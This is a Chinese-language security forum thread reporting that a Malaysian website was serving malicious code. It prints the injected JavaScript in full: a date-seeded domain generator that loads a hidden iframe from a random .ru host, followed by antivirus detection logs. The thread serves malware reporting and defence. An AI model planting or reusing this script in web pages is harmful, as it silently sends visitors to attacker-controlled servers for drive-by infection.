http://www.apexadvisory.com.my/

显示全部楼层 · 发表于 2014-1-5 07:34:17

function nextRandomNumber() {
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if (test > 0) {
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
var d = new Date(unix * 1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max) {
return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone) {
var rand = new RandomNumberGenerator(unix);
var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
var str = '';
for (var i = 0; i < length; i++) {
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setTimeout(function() {
try {
if (typeof iframeWasCreated == "undefined") {
iframeWasCreated = true;
var unix = Math.round(+new Date() / 1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {}
}, 500);

复制代码

j % 2

复制代码

Avira

2014/1/5 上午 07:30 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A6GBLLHM\apexadvisory_com_my[1].htm'
   包含病毒或有害的程式 'JS/Expack.VU.1' [virus]
   已採取動作：
   檔案會移動至 '5a4336a9.qua' 名稱底下的隔離區目錄!

2014/1/5 上午 07:30 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描.]。
   檔案數： 796
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2014/1/5 上午 07:29 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A6GBLLHM\apexadvisory_com_my[1].htm 中
   偵測到病毒或有害的程式 'JS/Expack.VU.1 [virus]'
   執行的動作：傳輸至掃描程式

2014/1/5 上午 07:29 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A6GBLLHM\apexadvisory_com_my[1].htm 中
   偵測到病毒或有害的程式 'JS/Expack.VU.1 [virus]'
   執行的動作：拒絕存取

2014/1/5 上午 07:29 [Web Protection] 發現惡意程式碼
   從 URL "http://www.apexadvisory.com.my/" 存取資料時，
   發現病毒或有害的程式 'JS/Expack.VU.1' [virus]。
   已採取動作：已略過

fs is

显示全部楼层 · 发表于 2014-1-5 12:54:31

阻止了 www.apexadvisory.com.my 的入侵企图,已阻止,Web Attack: Mass Injection Website 2

文件名: apexadvisory_com_my[1].htm
威胁名称: Trojan.Malscript
完整路径: c:\users\mr\appdata\local\microsoft\windows\temporary internet files\low\content.ie5\2v9o9wt7\apexadvisory_com_my[1].htm

____________________________

详细信息
未知的社区使用情况,  未知的文件存在时间,  风险高

原始
下载自
 未知

活动
已执行的操作: 已执行的操作: 1

____________________________

在电脑上的创建时间 
不可用

上次使用时间 
2014/1/5 ( 12:53:46 )

启动项目 
否

已启动 
否

____________________________

未知
诺顿社区中使用了此文件的用户数未知。

未知
此文件版本当前未知。

高
此文件具有高风险。

威胁类型: 病毒。将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。

____________________________

来源: 外部介质

____________________________

文件操作

文件: c:\users\mr\appdata\local\microsoft\windows\temporary internet files\low\content.ie5\2v9o9wt7\ apexadvisory_com_my[1].htm 已删除
____________________________

文件指纹 - SHA:
f4b5a29712faac48458cb73de263ad5cf371cd15e934053582303165924a07a0
文件指纹 - MD5:
不可用

显示全部楼层 · 发表于 2014-1-5 20:41:55

zmzcy 发表于 2014-1-5 12:54
阻止了 www.apexadvisory.com.my 的入侵企图,已阻止,Web Attack: Mass Injection Website 2

文件名: ape ...

常在河边走，哪有不湿鞋？

显示全部楼层 · 发表于 2014-1-6 11:58:14

微点杀毒，微点主防均报，杀毒处理成功

[已鉴定] http://www.apexadvisory.com.my/